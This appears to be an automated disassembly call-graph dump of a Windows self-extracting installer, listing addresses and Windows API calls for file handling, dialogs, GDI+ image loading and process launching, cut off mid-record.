90e617 53 API calls 23976->23977 23978 910d5e 23977->23978 23978->23967 23979->23772 23981 91081b 2 API calls 23980->23981 23982 91ac2a OleInitialize 23981->23982 23983 91ac4d GdiplusStartup SHGetMalloc 23982->23983 23983->23774 23985 91c5ce 23984->23985 23986 91c6e4 23985->23986 23987 911fac CharUpperW 23985->23987 24071 90f3fa 82 API calls 2 library calls 23985->24071 23986->23782 23986->23783 23987->23985 23990 91ec50 23989->23990 23991 91dbeb SetEnvironmentVariableW 23990->23991 23993 91dc0e 23991->23993 23992 91dc36 23992->23776 23993->23992 23994 91dc2a SetEnvironmentVariableW 23993->23994 23994->23992 24072 904065 23995->24072 23998 91b6dd LoadBitmapW 23999 91b70b GetObjectW 23998->23999 24000 91b6fe 23998->24000 24004 91b71a 23999->24004 24106 91a6c2 FindResourceW 24000->24106 24101 91a5c6 24004->24101 24006 91b770 24017 90da42 24006->24017 24007 91b74c 24122 91a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24007->24122 24008 91a6c2 13 API calls 24010 91b73d 24008->24010 24010->24007 24012 91b743 DeleteObject 24010->24012 24011 91b754 24123 91a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24011->24123 24012->24007 24014 91b75d 24124 91a80c 8 API calls 24014->24124 24016 91b764 DeleteObject 24016->24006 24135 90da67 24017->24135 24022 9190b7 24268 91eb38 24022->24268 24026 91acab GdiplusShutdown CoUninitialize 24025->24026 24026->23812 24028->23804 24029->23811 24031 91086d GetModuleHandleW 24030->24031 24031->23934 24031->23935 24033 90b15a GetVersionExW 24032->24033 24034 90b196 24032->24034 24033->24034 24034->23947 24036 91ec50 24035->24036 24037 910828 GetSystemDirectoryW 24036->24037 24038 910840 24037->24038 24039 91085e 24037->24039 24040 910851 LoadLibraryW 24038->24040 24039->23947 24040->24039 24041->23941 24043 90e627 24042->24043 24048 90e648 24043->24048 24047 923e1b 24046->24047 24047->23972 24047->24047 24054 90d9b0 24048->24054 24051 90e645 24051->23975 24052 90e66b LoadStringW 24052->24051 24053 90e682 LoadStringW 24052->24053 24053->24051 24059 90d8ec 24054->24059 24056 90d9cd 24057 90d9e2 24056->24057 24067 90d9f0 26 API calls 24056->24067 24057->24051 24057->24052 24060 90d904 24059->24060 24066 90d984 _strncpy 24059->24066 24062 90d928 24060->24062 24068 911da7 WideCharToMultiByte 24060->24068 24065 90d959 24062->24065 24069 90e5b1 50 API calls __vsnprintf 24062->24069 24070 926159 26 API calls 3 library calls 24065->24070 24066->24056 24067->24057 24068->24062 24069->24065 24070->24066 24071->23985 24073 90407c __vswprintf_c_l 24072->24073 24076 925fd4 24073->24076 24079 924097 24076->24079 24080 9240d7 24079->24080 24081 9240bf 24079->24081 24080->24081 24083 9240df 24080->24083 24096 9291a8 20 API calls _abort 24081->24096 24085 924636 __cftof 38 API calls 24083->24085 24084 9240c4 24097 929087 26 API calls _abort 24084->24097 24087 9240ef 24085->24087 24098 924601 20 API calls 2 library calls 24087->24098 24088 9240cf 24090 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24088->24090 24092 904086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24090->24092 24091 924167 24099 9249e6 51 API calls 4 library calls 24091->24099 24092->23998 24095 924172 24100 9246b9 20 API calls _free 24095->24100 24096->24084 24097->24088 24098->24091 24099->24095 24100->24088 24125 91a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24101->24125 24103 91a5cd 24104 91a5d9 24103->24104 24126 91a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24103->24126 24104->24006 24104->24007 24104->24008 24107 91a6e5 SizeofResource 24106->24107 24108 91a7d3 24106->24108 24107->24108 24109 91a6fc LoadResource 24107->24109 24108->23999 24108->24004 24109->24108 24110 91a711 LockResource 24109->24110 24110->24108 24111 91a722 GlobalAlloc 24110->24111 24111->24108 24112 91a73d GlobalLock 24111->24112 24113 91a7cc GlobalFree 24112->24113 24114 91a74c __InternalCxxFrameHandler 24112->24114 24113->24108 24115 91a754 CreateStreamOnHGlobal 24114->24115 24116 91a7c5 GlobalUnlock 24115->24116 24117 91a76c 24115->24117 24116->24113 24127 91a626 GdipAlloc 24117->24127 24120 91a7b0 24120->24116 24121 91a79a GdipCreateHBITMAPFromBitmap 24121->24120 24122->24011 24123->24014 24124->24016 24125->24103 24126->24104 24128 91a645 24127->24128 24129 91a638 24127->24129 24128->24116 24128->24120 24128->24121 24131 91a3b9 24129->24131 24132 91a3e1 GdipCreateBitmapFromStream 24131->24132 24133 91a3da GdipCreateBitmapFromStreamICM 24131->24133 24134 91a3e6 24132->24134 24133->24134 24134->24128 24136 90da75 __EH_prolog 24135->24136 24137 90daa4 GetModuleFileNameW 24136->24137 24138 90dad5 24136->24138 24139 90dabe 24137->24139 24181 9098e0 24138->24181 24139->24138 24141 90db31 24192 926310 24141->24192 24145 90e261 78 API calls 24147 90db05 24145->24147 24146 90db44 24148 926310 26 API calls 24146->24148 24147->24141 24147->24145 24159 90dd4a 24147->24159 24156 90db56 ___vcrt_FlsGetValue 24148->24156 24149 90dc85 24149->24159 24228 909d70 81 API calls 24149->24228 24153 90dc9f ___std_exception_copy 24154 909bd0 82 API calls 24153->24154 24153->24159 24157 90dcc8 ___std_exception_copy 24154->24157 24156->24149 24156->24159 24206 909e80 24156->24206 24222 909bd0 24156->24222 24227 909d70 81 API calls 24156->24227 24157->24159 24176 90dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24157->24176 24229 911b84 MultiByteToWideChar 24157->24229 24215 90959a 24159->24215 24160 90e159 24165 90e1de 24160->24165 24235 928cce 26 API calls 2 library calls 24160->24235 24162 90e16e 24236 927625 26 API calls 2 library calls 24162->24236 24164 90e214 24168 926310 26 API calls 24164->24168 24165->24164 24171 90e261 78 API calls 24165->24171 24167 90e1c6 24237 90e27c 78 API calls 24167->24237 24170 90e22d 24168->24170 24172 926310 26 API calls 24170->24172 24171->24165 24172->24159 24174 911da7 WideCharToMultiByte 24174->24176 24176->24159 24176->24160 24176->24174 24230 90e5b1 50 API calls __vsnprintf 24176->24230 24231 926159 26 API calls 3 library calls 24176->24231 24232 928cce 26 API calls 2 library calls 24176->24232 24233 927625 26 API calls 2 library calls 24176->24233 24234 90e27c 78 API calls 24176->24234 24179 90e29e GetModuleHandleW FindResourceW 24180 90da55 24179->24180 24180->24022 24182 9098ea 24181->24182 24183 90994b CreateFileW 24182->24183 24184 90996c GetLastError 24183->24184 24187 9099bb 24183->24187 24238 90bb03 24184->24238 24186 90998c 24186->24187 24189 909990 CreateFileW GetLastError 24186->24189 24188 9099ff 24187->24188 24190 9099e5 SetFileTime 24187->24190 24188->24147 24189->24187 24191 9099b5 24189->24191 24190->24188 24191->24187 24193 926349 24192->24193 24194 92634d 24193->24194 24205 926375 24193->24205 24242 9291a8 20 API calls _abort 24194->24242 24196 926699 24198 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24196->24198 24197 926352 24243 929087 26 API calls _abort 24197->24243 24200 9266a6 24198->24200 24200->24146 24201 92635d 24202 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24201->24202 24203 926369 24202->24203 24203->24146 24205->24196 24244 926230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24205->24244 24207 909e92 24206->24207 24211 909ea5 24206->24211 24209 909eb0 24207->24209 24245 906d5b 77 API calls 24207->24245 24209->24156 24210 909eb8 SetFilePointer 24210->24209 24212 909ed4 GetLastError 24210->24212 24211->24209 24211->24210 24212->24209 24213 909ede 24212->24213 24213->24209 24246 906d5b 77 API calls 24213->24246 24216 9095be 24215->24216 24221 9095cf 24215->24221 24217 9095d1 24216->24217 24218 9095ca 24216->24218 24216->24221 24252 909620 24217->24252 24247 90974e 24218->24247 24221->24179 24223 909bdc 24222->24223 24224 909be3 24222->24224 24223->24156 24224->24223 24226 909785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24224->24226 24267 906d1a 77 API calls 24224->24267 24226->24224 24227->24156 24228->24153 24229->24176 24230->24176 24231->24176 24232->24176 24233->24176 24234->24176 24235->24162 24236->24167 24237->24165 24239 90bb10 _wcslen 24238->24239 24240 90bbb8 GetCurrentDirectoryW 24239->24240 24241 90bb39 _wcslen 24239->24241 24240->24241 24241->24186 24242->24197 24243->24201 24244->24205 24245->24211 24246->24209 24248 909781 24247->24248 24249 909757 24247->24249 24248->24221 24249->24248 24258 90a1e0 24249->24258 24253 90962c 24252->24253 24254 90964a 24252->24254 24253->24254 24256 909638 CloseHandle 24253->24256 24255 909669 24254->24255 24266 906bd5 76 API calls 24254->24266 24255->24221 24256->24254 24259 91ec50 24258->24259 24260 90a1ed DeleteFileW 24259->24260 24261 90a200 24260->24261 24262 90977f 24260->24262 24263 90bb03 GetCurrentDirectoryW 24261->24263 24262->24221 24264 90a214 24263->24264 24264->24262 24265 90a218 DeleteFileW 24264->24265 24265->24262 24266->24255 24267->24224 24271 91eb3d ___std_exception_copy 24268->24271 24269 9190d6 24269->23796 24271->24269 24273 91eb59 24271->24273 24277 927a5e 7 API calls 2 library calls 24271->24277 24272 91f5c9 24279 92238d RaiseException 24272->24279 24273->24272 24278 92238d RaiseException 24273->24278 24275 91f5e6 24277->24271 24278->24272 24279->24275 24281 927ce1 _abort 24280->24281 24282 927cfa 24281->24282 24283 927ce8 24281->24283 24304 92ac31 EnterCriticalSection 24282->24304 24316 927e2f GetModuleHandleW 24283->24316 24286 927ced 24286->24282 24317 927e73 GetModuleHandleExW 24286->24317 24287 927d01 24291 927d76 24287->24291 24301 927d9f 24287->24301 24325 9287e0 20 API calls _abort 24287->24325 24295 927d8e 24291->24295 24300 928a91 _abort 5 API calls 24291->24300 24293 927de8 24326 932390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24293->24326 24294 927dbc 24308 927dee 24294->24308 24296 928a91 _abort 5 API calls 24295->24296 24296->24301 24300->24295 24305 927ddf 24301->24305 24304->24287 24327 92ac81 LeaveCriticalSection 24305->24327 24307 927db8 24307->24293 24307->24294 24328 92b076 24308->24328 24311 927e1c 24314 927e73 _abort 8 API calls 24311->24314 24312 927dfc GetPEB 24312->24311 24313 927e0c GetCurrentProcess TerminateProcess 24312->24313 24313->24311 24315 927e24 ExitProcess 24314->24315 24316->24286 24318 927ec0 24317->24318 24319 927e9d GetProcAddress 24317->24319 24321 927ec6 FreeLibrary 24318->24321 24322 927ecf 24318->24322 24320 927eb2 24319->24320 24320->24318 24321->24322 24323 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24322->24323 24324 927cf9 24323->24324 24324->24282 24325->24291 24327->24307 24329 92b09b 24328->24329 24333 92b091 24328->24333 24330 92ac98 _abort 5 API calls 24329->24330 24330->24333 24331 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24332 927df8 24331->24332 24332->24311 24332->24312 24333->24331 25460 911bbd GetCPInfo IsDBCSLeadByte 25386 91dca1 DialogBoxParamW 25461 91f3a0 27 API calls 25389 92a4a0 71 API calls _free 25390 9308a0 IsProcessorFeaturePresent 25422 91eda7 48 API calls _unexpected 25462 906faa 111 API calls 3 library calls 24344 91e1d1 14 API calls ___delayLoadHelper2@8 25391 91f4d3 20 API calls 25463 92a3d0 21 API calls 2 library calls 25464 932bd0 VariantClear 24348 9010d5 24353 905abd 24348->24353 24354 905ac7 __EH_prolog 24353->24354 24360 90b505 24354->24360 24356 905ad3 24366 905cac GetCurrentProcess GetProcessAffinityMask 24356->24366 24361 90b50f __EH_prolog 24360->24361 24367 90f1d0 82 API calls 24361->24367 24363 90b521 24368 90b61e 24363->24368 24367->24363 24369 90b630 _abort 24368->24369 24372 9110dc 24369->24372 24375 91109e GetCurrentProcess GetProcessAffinityMask 24372->24375 24376 90b597 24375->24376 24376->24356 24377 91e2d7 24378 91e1db 24377->24378 24379 91e85d ___delayLoadHelper2@8 14 API calls 24378->24379 24379->24378 25445 920ada 51 API calls 2 library calls 25425 91b5c0 100 API calls 25465 9177c0 118 API calls 25466 91ffc0 RaiseException _com_error::_com_error CallUnexpected 24475 91dec2 24476 91decf 24475->24476 24477 90e617 53 API calls 24476->24477 24478 91dedc 24477->24478 24479 904092 _swprintf 51 API calls 24478->24479 24480 91def1 SetDlgItemTextW 24479->24480 24483 91b568 PeekMessageW 24480->24483 24484 91b583 GetMessageW 24483->24484 24485 91b5bc 24483->24485 24486 91b599 IsDialogMessageW 24484->24486 24487 91b5a8 TranslateMessage DispatchMessageW 24484->24487 24486->24485 24486->24487 24487->24485 25446 9162ca 123 API calls __InternalCxxFrameHandler 25426 9095f0 80 API calls 25427 91fd4f 9 API calls 2 library calls 25448 905ef0 82 API calls 24495 9298f0 24503 92adaf 24495->24503 24498 929904 24500 92990c 24501 929919 24500->24501 24511 929920 11 API calls 24500->24511 24504 92ac98 _abort 5 API calls 24503->24504 24505 92add6 24504->24505 24506 92adee TlsAlloc 24505->24506 24507 92addf 24505->24507 24506->24507 24508 91fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24507->24508 24509 9298fa 24508->24509 24509->24498 24510 929869 20 API calls 2 library calls 24509->24510 24510->24500 24511->24498 24513 92abf0 24514 92abfb 24513->24514 24515 92af0a 11 API calls 24514->24515 24516 92ac24 24514->24516 24518 92ac20 24514->24518 24515->24514 24519 92ac50 DeleteCriticalSection 24516->24519 24519->24518 25393 9288f0 7 API calls ___scrt_uninitialize_crt 25395 922cfb 38 API calls 4 library calls 24546 91b7e0 24547 91b7ea __EH_prolog 24546->24547 24714 901316 24547->24714 24550 91b82a 24553 91b838 24550->24553 24554 91b89b 24550->24554 24629 91b841 24550->24629 24551 91bf0f 24779 91d69e 24551->24779 24557 91b878 24553->24557 24558 91b83c 24553->24558 24556 91b92e GetDlgItemTextW 24554->24556 24564 91b8b1 24554->24564 24556->24557 24563 91b96b 24556->24563 24566 91b95f KiUserCallbackDispatcher 24557->24566 24557->24629 24569 90e617 53 API calls 24558->24569 24558->24629 24559 91bf38 24561 91bf41 SendDlgItemMessageW 24559->24561 24562 91bf52 GetDlgItem SendMessageW 24559->24562 24560 91bf2a SendMessageW 24560->24559 24561->24562 24797 91a64d GetCurrentDirectoryW 24562->24797 24567 91b980 GetDlgItem 24563->24567 24711 91b974 24563->24711 24568 90e617 53 API calls 24564->24568 24566->24629 24572 91b994 SendMessageW SendMessageW 24567->24572 24573 91b9b7 SetFocus 24567->24573 24574 91b8ce SetDlgItemTextW 24568->24574 24570 91b85b 24569->24570 24819 90124f SHGetMalloc 24570->24819 24571 91bf82 GetDlgItem 24576 91bfa5 SetWindowTextW 24571->24576 24577 91bf9f 24571->24577 24572->24573 24578 91b9c7 24573->24578 24588 91b9e0 24573->24588 24579 91b8d9 24574->24579 24798 91abab GetClassNameW 24576->24798 24577->24576 24582 90e617 53 API calls 24578->24582 24585 91b8e6 GetMessageW 24579->24585 24579->24629 24580 91be55 24583 90e617 53 API calls 24580->24583 24586 91b9d1 24582->24586 24589 91be65 SetDlgItemTextW 24583->24589 24591 91b8fd IsDialogMessageW 24585->24591 24585->24629 24820 91d4d4 24586->24820 24587 91c1fc SetDlgItemTextW 24587->24629 24596 90e617 53 API calls 24588->24596 24593 91be79 24589->24593 24591->24579 24595 91b90c TranslateMessage DispatchMessageW 24591->24595 24598 90e617 53 API calls 24593->24598 24595->24579 24597 91ba17 24596->24597 24600 904092 _swprintf 51 API calls 24597->24600 24633 91be9c _wcslen 24598->24633 24599 91bff0 24604 91c020 24599->24604 24606 90e617 53 API calls 24599->24606 24607 91ba29 24600->24607 24601 91b9d9 24724 90a0b1 24601->24724 24602 91c73f 97 API calls 24602->24599 24611 91c73f 97 API calls 24604->24611 24623 91c0d8 24604->24623 24610 91c003 SetDlgItemTextW 24606->24610 24613 91d4d4 16 API calls 24607->24613 24608 91ba68 GetLastError 24609 91ba73 24608->24609 24730 91ac04 SetCurrentDirectoryW 24609->24730 24614 90e617 53 API calls 24610->24614 24616 91c03b 24611->24616 24612 91c18b 24617 91c194 EnableWindow 24612->24617 24618 91c19d 24612->24618 24613->24601 24619 91c017 SetDlgItemTextW 24614->24619 24622 91c072 24616->24622 24630 91c04d 24616->24630 24617->24618 24624 91c1ba 24618->24624 24838 9012d3 GetDlgItem EnableWindow 24618->24838 24619->24604 24620 91ba87 24627 91ba9e 24620->24627 24628 91ba90 GetLastError 24620->24628 24621 90e617 53 API calls 24621->24629 24631 91c0cb 24622->24631 24658 91c73f 97 API calls 24622->24658 24623->24612 24647 91c169 24623->24647 24660 90e617 53 API calls 24623->24660 24626 91c1e1 24624->24626 24637 91c1d9 SendMessageW 24624->24637 24626->24629 24638 90e617 53 API calls 24626->24638 24639 91bb20 24627->24639 24640 91baae GetTickCount 24627->24640 24690 91bb11 24627->24690 24628->24627 24836 919ed5 32 API calls 24630->24836 24634 91c73f 97 API calls 24631->24634 24632 91c1b0 24839 9012d3 GetDlgItem EnableWindow 24632->24839 24641 90e617 53 API calls 24633->24641 24661 91beed 24633->24661 24634->24623 24637->24626 24644 91b862 24638->24644 24648 91bcfb 24639->24648 24649 91bcf1 24639->24649 24650 91bb39 GetModuleFileNameW 24639->24650 24645 904092 _swprintf 51 API calls 24640->24645 24646 91bed0 24641->24646 24642 91bd56 24739 9012f1 GetDlgItem ShowWindow 24642->24739 24644->24587 24644->24629 24653 91bac7 24645->24653 24654 904092 _swprintf 51 API calls 24646->24654 24837 919ed5 32 API calls 24647->24837 24657 90e617 53 API calls 24648->24657 24649->24557 24649->24648 24830 90f28c 82 API calls 24650->24830 24651 91c066 24651->24622 24652 91bd66 24740 9012f1 GetDlgItem ShowWindow 24652->24740 24731 90966e 24653->24731 24654->24661 24664 91bd05 24657->24664 24666 91c0a0 24658->24666 24660->24623 24661->24621 24662 91c188 24662->24612 24663 91bb5f 24668 904092 _swprintf 51 API calls 24663->24668 24665 904092 _swprintf 51 API calls 24664->24665 24669 91bd23 24665->24669 24666->24631 24670 91c0a9 DialogBoxParamW 24666->24670 24667 91bd70 24671 90e617 53 API calls 24667->24671 24673 91bb81 CreateFileMappingW 24668->24673 24683 90e617 53 API calls 24669->24683 24670->24557 24670->24631 24674 91bd7a SetDlgItemTextW 24671->24674 24676 91bbe3 GetCommandLineW 24673->24676 24706 91bc60 __InternalCxxFrameHandler 24673->24706 24741 9012f1 GetDlgItem ShowWindow 24674->24741 24675 91baed 24680 91baff 24675->24680 24681 91baf4 GetLastError 24675->24681 24677 91bbf4 24676->24677 24831 91b425 SHGetMalloc 24677->24831 24678 91bc6b ShellExecuteExW 24704 91bc88 24678->24704 24685 90959a 80 API calls 24680->24685 24681->24680 24687 91bd3d 24683->24687 24684 91bd8c SetDlgItemTextW GetDlgItem 24688 91bdc1 24684->24688 24689 91bda9 GetWindowLongW SetWindowLongW 24684->24689 24685->24690 24686 91bc10 24832 91b425 SHGetMalloc 24686->24832 24742 91c73f 24688->24742 24689->24688 24690->24639 24690->24642 24693 91bc1c 24833 91b425 SHGetMalloc 24693->24833 24696 91bccb 24696->24649 24702 91bce1 UnmapViewOfFile CloseHandle 24696->24702 24697 91c73f 97 API calls 24699 91bddd 24697->24699 24698 91bc28 24834 90f3fa 82 API calls 2 library calls 24698->24834 24767 91da52 24699->24767 24702->24649 24703 91bc3f MapViewOfFile 24703->24706 24704->24696 24707 91bcb7 Sleep 24704->24707 24706->24678 24707->24696 24707->24704 24708 91c73f 97 API calls 24712 91be03 24708->24712 24709 91be2c 24835 9012d3 GetDlgItem EnableWindow 24709->24835 24711->24557 24711->24580 24712->24709 24713 91c73f 97 API calls 24712->24713 24713->24709 24715 901378 24714->24715 24716 90131f 24714->24716 24841 90e2c1 GetWindowLongW SetWindowLongW 24715->24841 24718 901385 24716->24718 24840 90e2e8 62 API calls 2 library calls 24716->24840 24718->24550 24718->24551 24718->24629 24720 901341 24720->24718 24721 901354 GetDlgItem 24720->24721 24721->24718 24722 901364 24721->24722 24722->24718 24723 90136a SetWindowTextW 24722->24723 24723->24718 24727 90a0bb 24724->24727 24725 90a14c 24726 90a2b2 8 API calls 24725->24726 24728 90a175 24725->24728 24726->24728 24727->24725 24727->24728 24842 90a2b2 24727->24842 24728->24608 24728->24609 24730->24620 24732 909678 24731->24732 24733 9096d5 CreateFileW 24732->24733 24734 9096c9 24732->24734 24733->24734 24735 90971f 24734->24735 24736 90bb03 GetCurrentDirectoryW 24734->24736 24735->24675 24737 909704 24736->24737 24737->24735 24738 909708 CreateFileW 24737->24738 24738->24735 24739->24652 24740->24667 24741->24684 24743 91c749 __EH_prolog 24742->24743 24744 91bdcf 24743->24744 24745 91b314 ExpandEnvironmentStringsW 24743->24745 24744->24697 24751 91c780 _wcslen _wcsrchr 24745->24751 24747 91b314 ExpandEnvironmentStringsW 24747->24751 24748 91ca67 SetWindowTextW 24748->24751 24751->24744 24751->24747 24751->24748 24752 923e3e 22 API calls 24751->24752 24754 91c855 SetFileAttributesW 24751->24754 24759 91cc31 GetDlgItem SetWindowTextW SendMessageW 24751->24759 24762 91cc71 SendMessageW 24751->24762 24863 911fbb CompareStringW 24751->24863 24864 91a64d GetCurrentDirectoryW 24751->24864 24866 90a5d1 6 API calls 24751->24866 24867 90a55a FindClose 24751->24867 24868 91b48e 76 API calls 2 library calls 24751->24868 24752->24751 24755 91c90f GetFileAttributesW 24754->24755 24766 91c86f _abort _wcslen 24754->24766 24755->24751 24758 91c921 DeleteFileW 24755->24758 24758->24751 24760 91c932 24758->24760 24759->24751 24761 904092 _swprintf 51 API calls 24760->24761 24763 91c952 GetFileAttributesW 24761->24763 24762->24751 24763->24760 24764 91c967 MoveFileW 24763->24764 24764->24751 24765 91c97f MoveFileExW 24764->24765 24765->24751 24766->24751 24766->24755 24865 90b991 51 API calls 2 library calls 24766->24865 24768 91da5c __EH_prolog 24767->24768 24869 910659 24768->24869 24770 91da8d 24873 905b3d 24770->24873 24772 91daab 24877 907b0d 24772->24877 24776 91dafe 24893 907b9e 24776->24893 24778 91bdee 24778->24708 24780 91d6a8 24779->24780 24781 91a5c6 4 API calls 24780->24781 24782 91d6ad 24781->24782 24783 91d6b5 GetWindow 24782->24783 24784 91bf15 24782->24784 24783->24784 24790 91d6d5 24783->24790 24784->24559 24784->24560 24785 91d6e2 GetClassNameW 25356 911fbb CompareStringW 24785->25356 24787 91d706 GetWindowLongW 24788 91d76a GetWindow 24787->24788 24789 91d716 SendMessageW 24787->24789 24788->24784 24788->24790 24789->24788 24791 91d72c GetObjectW 24789->24791 24790->24784 24790->24785 24790->24787 24790->24788 25357 91a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24791->25357 24793 91d743 25358 91a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24793->25358 25359 91a80c 8 API calls 24793->25359 24796 91d754 SendMessageW DeleteObject 24796->24788 24797->24571 24799 91abcc 24798->24799 24804 91abf1 24798->24804 25360 911fbb CompareStringW 24799->25360 24801 91abf6 SHAutoComplete 24802 91abff 24801->24802 24806 91b093 24802->24806 24803 91abdf 24803->24804 24805 91abe3 FindWindowExW 24803->24805 24804->24801 24804->24802 24805->24804 24807 91b09d __EH_prolog 24806->24807 24808 9013dc 84 API calls 24807->24808 24809 91b0bf 24808->24809 25361 901fdc 24809->25361 24812 91b0d9 24814 901692 86 API calls 24812->24814 24813 91b0eb 24815 9019af 128 API calls 24813->24815 24816 91b0e4 24814->24816 24818 91b10d __InternalCxxFrameHandler ___std_exception_copy 24815->24818 24816->24599 24816->24602 24817 901692 86 API calls 24817->24816 24818->24817 24819->24644 24821 91b568 5 API calls 24820->24821 24822 91d4e0 GetDlgItem 24821->24822 24823 91d502 24822->24823 24824 91d536 SendMessageW SendMessageW 24822->24824 24829 91d50d ShowWindow SendMessageW SendMessageW 24823->24829 24825 91d591 SendMessageW SendMessageW SendMessageW 24824->24825 24826 91d572 24824->24826 24827 91d5c4 SendMessageW 24825->24827 24828 91d5e7 SendMessageW 24825->24828 24826->24825 24827->24828 24828->24601 24829->24824 24830->24663 24831->24686 24832->24693 24833->24698 24834->24703 24835->24711 24836->24651 24837->24662 24838->24632 24839->24624 24840->24720 24841->24718 24843 90a2bf 24842->24843 24844 90a2e3 24843->24844 24845 90a2d6 CreateDirectoryW 24843->24845 24846 90a231 3 API calls 24844->24846 24845->24844 24847 90a316 24845->24847 24848 90a2e9 24846->24848 24850 90a325 24847->24850 24855 90a4ed 24847->24855 24849 90a329 GetLastError 24848->24849 24851 90bb03 GetCurrentDirectoryW 24848->24851 24849->24850 24850->24727 24853 90a2ff 24851->24853 24853->24849 24854 90a303 CreateDirectoryW 24853->24854 24854->24847 24854->24849 24856 91ec50 24855->24856 24857 90a4fa SetFileAttributesW 24856->24857 24858 90a510 24857->24858 24859 90a53d 24857->24859 24860 90bb03 GetCurrentDirectoryW 24858->24860 24859->24850 24861 90a524 24860->24861 24861->24859 24862 90a528 SetFileAttributesW 24861->24862 24862->24859 24863->24751 24864->24751 24865->24766 24866->24751 24867->24751 24868->24751 24870 910666 _wcslen 24869->24870 24897 9017e9 24870->24897 24872 91067e 24872->24770 24874 910659 _wcslen 24873->24874 24875 9017e9 78 API calls 24874->24875 24876 91067e 24875->24876 24876->24772 24878 907b17 __EH_prolog 24877->24878 24914 90ce40 24878->24914 24880 907b32 24881 91eb38 8 API calls 24880->24881 24882 907b5c 24881->24882 24920 914a76 24882->24920 24885 907c7d 24886 907c87 24885->24886 24888 907cf1 24886->24888 24949 90a56d 24886->24949 24889 907d50 24888->24889 24927 908284 24888->24927 24892 907d92 24889->24892 24955 90138b 74 API calls 24889->24955 24892->24776 24894 907bac 24893->24894 24896 907bb3 24893->24896 24895 912297 86 API calls 24894->24895 24895->24896 24898 9017ff 24897->24898 24909 90185a __InternalCxxFrameHandler 24897->24909 24899 901828 24898->24899 24910 906c36 76 API calls __vswprintf_c_l 24898->24910 24900 901887 24899->24900 24904 901847 ___std_exception_copy 24899->24904 24903 923e3e 22 API calls 24900->24903 24902 90181e 24911 906ca7 75 API calls 24902->24911 24906 90188e 24903->24906 24904->24909 24912 906ca7 75 API calls 24904->24912 24906->24909 24913 906ca7 75 API calls 24906->24913 24909->24872 24910->24902 24911->24899 24912->24909 24913->24909 24915 90ce4a __EH_prolog 24914->24915 24916 91eb38 8 API calls 24915->24916 24917 90ce8d 24916->24917 24918 91eb38 8 API calls 24917->24918 24919 90ceb1 24918->24919 24919->24880 24921 914a80 __EH_prolog 24920->24921 24922 91eb38 8 API calls 24921->24922 24924 914a9c 24922->24924 24923 907b8b 24923->24885 24924->24923 24926 910e46 80 API calls 24924->24926 24926->24923 24928 90828e __EH_prolog 24927->24928 24956 9013dc 24928->24956 24930 9082aa 24931 9082bb 24930->24931 25099 909f42 24930->25099 24934 9082f2 24931->24934 24964 901a04 24931->24964 25095 901692 24934->25095 24937 908389 24983 908430 24937->24983 24940 9083e8 24991 901f6d 24940->24991 24944 9082ee 24944->24934 24944->24937 24947 90a56d 7 API calls 24944->24947 25103 90c0c5 CompareStringW _wcslen 24944->25103 24945 9083f3 24945->24934 24995 903b2d 24945->24995 25007 90848e 24945->25007 24947->24944 24950 90a582 24949->24950 24951 90a5b0 24950->24951 25345 90a69b 24950->25345 24951->24886 24953 90a592 24953->24951 24954 90a597 FindClose 24953->24954 24954->24951 24955->24892 24957 9013e1 __EH_prolog 24956->24957 24958 90ce40 8 API calls 24957->24958 24959 901419 24958->24959 24960 91eb38 8 API calls 24959->24960 24963 901474 _abort 24959->24963 24961 901461 24960->24961 24962 90b505 84 API calls 24961->24962 24961->24963 24962->24963 24963->24930 24965 901a0e __EH_prolog 24964->24965 24967 901a61 24965->24967 24971 901b9b 24965->24971 25104 9013ba 24965->25104 24968 901bc7 24967->24968 24967->24971 24973 901bd4 24967->24973 25107 90138b 74 API calls 24968->25107 24971->24944 24972 903b2d 101 API calls 24977 901c12 24972->24977 24973->24971 24973->24972 24974 901c5a 24974->24971 24978 901c8d 24974->24978 25108 90138b 74 API calls 24974->25108 24976 903b2d 101 API calls 24976->24977 24977->24974 24977->24976 24978->24971 24981 909e80 79 API calls 24978->24981 24979 903b2d 101 API calls 24980 901cde 24979->24980 24980->24971 24980->24979 24981->24980 24982 909e80 79 API calls 24982->24967 25126 90cf3d 24983->25126 24985 908440 25130 9113d2 GetSystemTime SystemTimeToFileTime 24985->25130 24987 9083a3 24987->24940 24988 911b66 24987->24988 25131 91de6b 24988->25131 24992 901f72 __EH_prolog 24991->24992 24994 901fa6 24992->24994 25139 9019af 24992->25139 24994->24945 24996 903b39 24995->24996 24997 903b3d 24995->24997 24996->24945 25006 909e80 79 API calls 24997->25006 24998 903b4f 24999 903b78 24998->24999 25000 903b6a 24998->25000 25272 90286b 101 API calls 3 library calls 24999->25272 25002 903baa 25000->25002 25271 9032f7 89 API calls 2 library calls 25000->25271 25002->24945 25004 903b76 25004->25002 25273 9020d7 74 API calls 25004->25273 25006->24998 25008 908498 __EH_prolog 25007->25008 25011 9084d5 25008->25011 25014 908513 25008->25014 25298 918c8d 103 API calls 25008->25298 25010 9084f5 25012 9084fa 25010->25012 25013 90851c 25010->25013 25011->25010 25011->25014 25017 90857a 25011->25017 25012->25014 25299 907a0d 152 API calls 25012->25299 25013->25014 25300 918c8d 103 API calls 25013->25300 25014->24945 25017->25014 25274 905d1a 25017->25274 25019 908605 25019->25014 25280 908167 25019->25280 25022 908797 25023 90a56d 7 API calls 25022->25023 25026 908802 25022->25026 25023->25026 25025 90d051 82 API calls 25032 90885d 25025->25032 25286 907c0d 25026->25286 25027 